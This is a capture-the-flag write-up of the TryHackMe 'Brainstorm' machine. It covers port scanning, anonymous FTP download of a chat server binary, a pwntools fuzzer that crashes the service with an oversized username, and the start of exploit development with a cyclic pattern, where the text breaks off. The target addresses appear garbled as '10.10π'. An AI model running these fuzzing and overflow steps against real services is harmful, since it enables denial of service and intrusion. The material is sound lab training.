Writeup Tryhackme Brainstorm
Writeup about the TryHackMe machine Brainstorm.
0 - Basic info
Windows machine
1 - Reconnaissance and enumeration
Starting with nmap. This time I wasted time improving my nmap scans because they were really noisy and slow.
The scan is divided into two parts. First, a quick scan of all ports that only looks for open ports and dumps the result in greppable format to ports.txt:
nmap -p- --open -T5 -v 10.10π -n -Pn -oG ports.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 20:00 CEST
Initiating Connect Scan at 20:00
Scanning 10.10π [65535 ports]
Discovered open port 3389/tcp on 10.10π
Discovered open port 21/tcp on 10.10π
Discovered open port 9999/tcp on 10.10π
Connect Scan Timing: About 19.35% done; ETC: 20:03 (0:02:09 remaining)
Connect Scan Timing: About 64.45% done; ETC: 20:02 (0:00:34 remaining)
Completed Connect Scan at 20:02, 88.02s elapsed (65535 total ports)
Nmap scan report for 10.10π
Host is up (0.037s latency).
Not shown: 65532 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
3389/tcp open ms-wbt-server
9999/tcp open abyss
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 88.15 seconds
To extract the port list I use grep -oP (Perl-compatible regex) to pull out every port/open match, tr to replace the characters of /open with spaces, xargs to join the result on one line, and tr again to turn the spaces into commas. Two caveats: tr translates characters, not strings, so '/open' is really the character set /, o, p, e, n (harmless here because the rest of each match is digits only), and \d{2,5} only matches two- to five-digit port numbers, so a single-digit port such as 7/tcp would be silently dropped; \d{1,5} is the safer quantifier.
cat ports.txt | grep -oP '\d{2,5}/open' | tr '/open' ' '| xargs | tr ' ' ','
21,3389,9999
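As an added example (not part of the original writeup), here is the same port extraction done in Python over nmap's greppable output, parsing the Ports: field itself instead of regexing the whole file. The sample -oG text is constructed for the example and deliberately includes a single-digit port that the \d{2,5} one-liner above would drop:

```python
import re

# Constructed sample of nmap -oG output (not the ports.txt from the writeup).
# The single-digit port 7/tcp is there on purpose: \d{2,5} would drop it.
SAMPLE_GNMAP = (
    "# Nmap 7.91 scan initiated Sat Jul  3 20:00:00 2021 as: nmap -p- --open -oG ports.txt 10.10.0.5\n"
    "Host: 10.10.0.5 ()\tStatus: Up\n"
    "Host: 10.10.0.5 ()\tPorts: 7/open/tcp//echo///, 21/open/tcp//ftp///, "
    "3389/open/tcp//ms-wbt-server///, 9999/open/tcp//abyss///\tIgnored State: filtered (65531)\n"
    "# Nmap done at Sat Jul  3 20:02:00 2021 -- 1 IP address (1 host up) scanned in 88.15 seconds\n"
)

# One entry of the Ports: field is port/state/protocol/owner/service/rpcinfo/version/
PORT_ENTRY = re.compile(r"(\d{1,5})/([\w|]+)/(tcp|udp|sctp)/")


def open_ports(gnmap_text, proto="tcp"):
    """Map each host to the sorted list of its open ports for one protocol."""
    hosts = {}
    for line in gnmap_text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comment lines and Status-only lines carry no port data
        host = line.split()[1]
        # the Ports: field ends at the next tab-separated field (e.g. Ignored State:)
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, pr in PORT_ENTRY.findall(ports_field):
            if state == "open" and pr == proto:
                hosts.setdefault(host, set()).add(int(port))
    return {h: sorted(p) for h, p in hosts.items()}


def nmap_port_arg(gnmap_text, host, proto="tcp"):
    """Comma-separated list ready for nmap -p, e.g. '7,21,3389,9999'."""
    return ",".join(str(p) for p in open_ports(gnmap_text, proto).get(host, []))


if __name__ == "__main__":
    print(nmap_port_arg(SAMPLE_GNMAP, "10.10.0.5"))
```

The result can be passed straight to the second scan as `-p$(python3 ports.py)`; because the state field is checked explicitly, a `closed` or `open|filtered` entry never sneaks into the list.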
Then a deeper scan (default scripts and version detection) against only those ports:
nmap -sC -sV -Pn -p$(cat ports.txt | grep -oP '\d{2,5}/open' | tr '/open' ' '| xargs | tr ' ' ',') 10.10π -oN full_scan2.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 20:45 CEST
Nmap scan report for 10.10π
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|_ SYST: Windows_NT
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=brainstorm
| Not valid before: 2021-07-02T17:09:32
|_Not valid after: 2022-01-01T17:09:32
|_ssl-date: 2021-07-03T18:47:40+00:00; -37s from scanner time.
9999/tcp open abyss?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| Welcome to Brainstorm chat (beta)
| Please enter your username (max 20 characters): Write a message:
| NULL:
| Welcome to Brainstorm chat (beta)
|_ Please enter your username (max 20 characters):
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.91%I=7%D=7/3%Time=60E0B03B%P=x86_64-pc-linux-gnu%r(NUL
SF:L,52,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20enter\
SF:x20your\x20username\x20\(max\x2020\x20characters\):\x20")%r(GetRequest,
SF:63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20enter\x2
SF:0your\x20username\x20\(max\x2020\x20characters\):\x20Write\x20a\x20mess
SF:age:\x20")%r(HTTPOptions,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(b
SF:eta\)\nPlease\x20enter\x20your\x20username\x20\(max\x2020\x20characters
SF:\):\x20Write\x20a\x20message:\x20")%r(FourOhFourRequest,63,"Welcome\x20
SF:to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20enter\x20your\x20userna
SF:me\x20\(max\x2020\x20characters\):\x20Write\x20a\x20message:\x20")%r(Ja
SF:vaRMI,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20en
SF:ter\x20your\x20username\x20\(max\x2020\x20characters\):\x20Write\x20a\x
SF:20message:\x20")%r(GenericLines,63,"Welcome\x20to\x20Brainstorm\x20chat
SF:\x20\(beta\)\nPlease\x20enter\x20your\x20username\x20\(max\x2020\x20cha
SF:racters\):\x20Write\x20a\x20message:\x20")%r(RTSPRequest,63,"Welcome\x2
SF:0to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20enter\x20your\x20usern
SF:ame\x20\(max\x2020\x20characters\):\x20Write\x20a\x20message:\x20")%r(R
SF:PCCheck,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20
SF:enter\x20your\x20username\x20\(max\x2020\x20characters\):\x20Write\x20a
SF:\x20message:\x20")%r(DNSVersionBindReqTCP,63,"Welcome\x20to\x20Brainsto
SF:rm\x20chat\x20\(beta\)\nPlease\x20enter\x20your\x20username\x20\(max\x2
SF:020\x20characters\):\x20Write\x20a\x20message:\x20")%r(DNSStatusRequest
SF:TCP,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease\x20ente
SF:r\x20your\x20username\x20\(max\x2020\x20characters\):\x20Write\x20a\x20
SF:message:\x20")%r(Help,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta
SF:\)\nPlease\x20enter\x20your\x20username\x20\(max\x2020\x20characters\):
SF:\x20Write\x20a\x20message:\x20")%r(SSLSessionReq,63,"Welcome\x20to\x20B
SF:rainstorm\x20chat\x20\(beta\)\nPlease\x20enter\x20your\x20username\x20\
SF:(max\x2020\x20characters\):\x20Write\x20a\x20message:\x20")%r(TerminalS
SF:erverCookie,63,"Welcome\x20to\x20Brainstorm\x20chat\x20\(beta\)\nPlease
SF:\x20enter\x20your\x20username\x20\(max\x2020\x20characters\):\x20Write\
SF:x20a\x20message:\x20");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -37s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.20 seconds
Two interesting things stand out: an FTP server that allows anonymous login, and an unknown service on port 9999 that answers with a chat banner.
I downloaded the files from the FTP server using the anonymous login:
ftp 10.10π
Connected to 10.10π.
220 Microsoft FTP Service
Name (10.10π:u915): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-29-19 08:36PM <DIR> chatserver
226 Transfer complete.
ftp> cd chatserver
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-29-19 10:26PM 43747 chatserver.exe
08-29-19 10:27PM 30761 essfunc.dll
226 Transfer complete.
Downloading the files:
ftp> get chatserver.exe
local: chatserver.exe remote: chatserver.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 45 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
43747 bytes received in 0.35 secs (122.8856 kB/s)
ftp> get essfunc.dll
local: essfunc.dll remote: essfunc.dll
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 32 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
30761 bytes received in 0.15 secs (194.3710 kB/s)
Note: I did this wrong, because I realized that I had downloaded the files in text (ASCII) mode and not in binary mode… I came back to this after getting stuck for a while because I could not run the .exe file.
The "bare linefeeds received in ASCII mode" warnings above are the tell-tale sign: ASCII mode translates line endings, which corrupts a binary. Before downloading the files, set the transfer type to binary:
ftp> bin
200 Type set to I.
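An added example (not from the original writeup) of doing the download in binary mode from Python and checking the result before spending time debugging it: ftplib's retrbinary sends TYPE I itself, and a two-field PE header check (the MZ magic plus the PE signature at e_lfanew) catches a file that went through line-ending translation. The sample file is a constructed blob containing only those two fields, not chatserver.exe, and the damage function is a simplified model of what a Unix client does in ASCII mode (CRLF becomes LF):

```python
import ftplib
import struct


def is_valid_pe(data):
    """Cheap sanity check for a downloaded Windows binary: 'MZ' magic at offset 0 and
    the 'PE\\0\\0' signature at the offset stored in e_lfanew (DOS header field 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def ascii_mode_damage(data):
    """Simplified model of an ASCII-mode transfer into a Unix client: CRLF becomes LF,
    so every 0x0d 0x0a pair in the binary loses a byte and all later offsets shift."""
    return data.replace(b"\r\n", b"\n")


def fetch_binary(host, remote_path, user="anonymous", passwd="anonymous@"):
    """Download remote_path with TYPE I (retrbinary sets it) and verify the result.
    This is the only network call here; the offline checks below do not use it."""
    buf = bytearray()
    with ftplib.FTP(host) as ftp:
        ftp.login(user, passwd)
        ftp.retrbinary("RETR " + remote_path, buf.extend)
    data = bytes(buf)
    if not is_valid_pe(data):
        raise ValueError("%s is not a PE image after download; check the transfer mode" % remote_path)
    return data


def build_sample_pe():
    """Constructed minimal blob (not chatserver.exe): only the two fields the check reads,
    with CRLF pairs in the DOS stub so that ASCII translation shifts the PE signature."""
    blob = bytearray(b"MZ" + b"\x00" * 0x3E)        # 0x40-byte DOS header
    struct.pack_into("<I", blob, 0x3C, 0x80)         # e_lfanew -> 0x80
    blob += b"\r\n" * 8 + b"\x00" * (0x80 - 0x40 - 16)
    blob += b"PE\0\0" + b"\x00" * 20
    return bytes(blob)


if __name__ == "__main__":
    sample = build_sample_pe()
    print(is_valid_pe(sample), is_valid_pe(ascii_mode_damage(sample)))
```

Comparing the downloaded size with the size in the FTP listing (43747 and 30761 bytes above) is the even cheaper check: an ASCII transfer that touched any byte changes the length.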
At this point it is clear that these are most likely the same binaries running on port 9999, so we can debug and study them locally to try to exploit the chat service.
Let's interact with the chat service:
nc 10.10π 9999
Welcome to Brainstorm chat (beta)
Please enter your username (max 20 characters): u915
Write a message: ok
Sat Jul 03 12:02:11 2021
u915 said: ok
There are two input strings we can test for a vulnerability: the username and the message.
Note: for some reason the valid answer to the question (How many ports are open?) is not 3. I "bruteforced" the answer and the valid answer is 6; don't ask me why, because I ran a lot of scans and always got the same open ports.
2 - Vulnerability Identification
Studying the .exe and .dll obtained from the FTP server in detail on a separate Windows machine.
I used the same Windows 7 TryHackMe machine from the stack buffer overflow preparation, connecting over RDP:
xfreerdp /u:admin /p:password /cert:ignore /v:MACHINE_IP /workarea
I wrote a custom Python script to fuzz the username; after a bit of tuning the script looks like this:
#!/usr/bin/env python3
from pwn import *

HOST = "10.10π"
PORT = 9999
LIMIT = 60
CHARS_FUZZ = 500

for x in range(1, LIMIT):
    r = remote(HOST, PORT)
    print(r.recvline(timeout=1))   # "Welcome to Brainstorm chat (beta)"
    print(r.recvline(timeout=1))   # username prompt has no trailing newline, so this times out
    print(f"[+] SENDING USERNAME{CHARS_FUZZ * x} CHARS, COUNTER:{x}")
    r.send(b"A" * CHARS_FUZZ * x + b"\r\n")
    r.clean()
    print("[+] SENDING CHAT")
    r.send(b"Ok\r\n")
    print(r.recvline(timeout=1))
    print(r.recvline(timeout=1))
    print(r.recvline(timeout=1))
    # A healthy server answers "<username> said: Ok"; an empty read after the timeout
    # (or EOF on the socket) means the process died, so this length crashed it.
    try:
        crashed = r.recvline(timeout=4) == b""
    except EOFError:
        crashed = True
    if crashed:
        print("[!] KO CHAT")
        r.close()
        break
    r.clean()
    r.close()
Fuzzing in increments of 500 chars:
python3 fuzz1.py
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME500 CHARS, COUNTER:1
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:07 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME1000 CHARS, COUNTER:2
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:09 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME1500 CHARS, COUNTER:3
[+] SENDING CHAT
b'Write a message: \n'
b'\n'
b'Sat Jul 03 16:13:10 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME2000 CHARS, COUNTER:4
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:11 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME2500 CHARS, COUNTER:5
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:13 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME3000 CHARS, COUNTER:6
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:14 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME3500 CHARS, COUNTER:7
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:15 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME4000 CHARS, COUNTER:8
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:17 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME4500 CHARS, COUNTER:9
[+] SENDING CHAT
b'\n'
b'\n'
b'Sat Jul 03 16:13:18 2021\n'
[*] Closed connection to 10.10π port 9999
[+] Opening connection to 10.10π on port 9999: Done
b'Welcome to Brainstorm chat (beta)\n'
b''
[+] SENDING USERNAME5000 CHARS, COUNTER:10
[+] SENDING CHAT
b''
b''
b''
[!] KO CHAT
[*] Closed connection to 10.10π port 9999
The server crashes with a username between 4500 and 5000 characters.
So the server is vulnerable to a buffer overflow. At the very least we can crash the service.
3 - Exploit development
Start by creating a unique, non-repeating pattern of 5000 chars:
msf-pattern_create -l 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9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6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2F
d3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk
Send the pattern with a modified version of the previous Python script to trigger the overflow, this time with Immunity Debugger attached to chatserver.exe on the Windows VM:
#!/usr/bin/env python3
from pwn import *

HOST = "10.10π"
PORT = 9999
